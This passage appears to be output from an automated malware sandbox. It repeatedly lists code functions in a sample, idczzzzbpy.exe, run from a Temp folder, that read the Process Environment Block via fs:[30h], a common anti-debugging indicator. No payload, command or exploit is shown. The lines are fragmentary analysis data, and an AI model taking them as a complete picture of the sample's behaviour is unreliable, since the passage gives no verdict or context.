          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]2_2_0168A229
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]2_2_016A4A2C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]2_2_016A4A2C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]2_2_0172AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]2_2_0172AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678A0A mov eax, dword ptr fs:[00000030h]2_2_01678A0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]2_2_0166AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]2_2_0166AA16
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01683A1C mov eax, dword ptr fs:[00000030h]2_2_01683A1C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov ecx, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]2_2_01665210
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692AE4 mov eax, dword ptr fs:[00000030h]2_2_01692AE4
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692ACB mov eax, dword ptr fs:[00000030h]2_2_01692ACB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]2_2_016652A5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]2_2_0167AAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]2_2_0167AAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FAB0 mov eax, dword ptr fs:[00000030h]2_2_0169FAB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]2_2_0169D294
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]2_2_0169D294
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]2_2_0168C577
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]2_2_0168C577
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A3D43 mov eax, dword ptr fs:[00000030h]2_2_016A3D43
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E3540 mov eax, dword ptr fs:[00000030h]2_2_016E3540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01713D40 mov eax, dword ptr fs:[00000030h]2_2_01713D40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01687D50 mov eax, dword ptr fs:[00000030h]2_2_01687D50
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738D34 mov eax, dword ptr fs:[00000030h]2_2_01738D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172E539 mov eax, dword ptr fs:[00000030h]2_2_0172E539
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]2_2_01694D3B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]2_2_01673D34
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AD30 mov eax, dword ptr fs:[00000030h]2_2_0166AD30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016EA537 mov eax, dword ptr fs:[00000030h]2_2_016EA537
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01718DF1 mov eax, dword ptr fs:[00000030h]2_2_01718DF1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]2_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]2_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]2_2_0172FDE2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov ecx, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]2_2_016E6DC9
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016935A1 mov eax, dword ptr fs:[00000030h]2_2_016935A1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]2_2_01691DB5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]2_2_017305AC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]2_2_017305AC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]2_2_01662D8A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]2_2_0169FD9B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]2_2_0169FD9B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168746D mov eax, dword ptr fs:[00000030h]2_2_0168746D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]2_2_0169AC7B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A44B mov eax, dword ptr fs:[00000030h]2_2_0169A44B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]2_2_016FC450
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]2_2_016FC450
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169BC2C mov eax, dword ptr fs:[00000030h]2_2_0169BC2C
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]2_2_016E6C0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]2_2_016E6C0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]2_2_016E6C0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]2_2_016E6C0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]2_2_01721C06
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]2_2_0173740D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]2_2_0173740D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]2_2_0173740D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017214FB mov eax, dword ptr fs:[00000030h]2_2_017214FB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]2_2_016E6CF0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]2_2_016E6CF0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]2_2_016E6CF0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738CD6 mov eax, dword ptr fs:[00000030h]2_2_01738CD6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167849B mov eax, dword ptr fs:[00000030h]2_2_0167849B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167FF60 mov eax, dword ptr fs:[00000030h]2_2_0167FF60
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738F6A mov eax, dword ptr fs:[00000030h]2_2_01738F6A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167EF40 mov eax, dword ptr fs:[00000030h]2_2_0167EF40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]2_2_01664F2E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]2_2_01664F2E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]2_2_0168B73D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]2_2_0168B73D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169E730 mov eax, dword ptr fs:[00000030h]2_2_0169E730
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]2_2_0169A70E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]2_2_0169A70E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]2_2_0173070D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]2_2_0173070D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168F716 mov eax, dword ptr fs:[00000030h]2_2_0168F716
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]2_2_016FFF10
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]2_2_016FFF10
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A37F5 mov eax, dword ptr fs:[00000030h]2_2_016A37F5
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678794 mov eax, dword ptr fs:[00000030h]2_2_01678794
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]2_2_016E7794
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]2_2_016E7794
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]2_2_016E7794
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167766D mov eax, dword ptr fs:[00000030h]2_2_0167766D
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]2_2_0168AE73
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]2_2_0168AE73
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]2_2_0168AE73
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]2_2_0168AE73
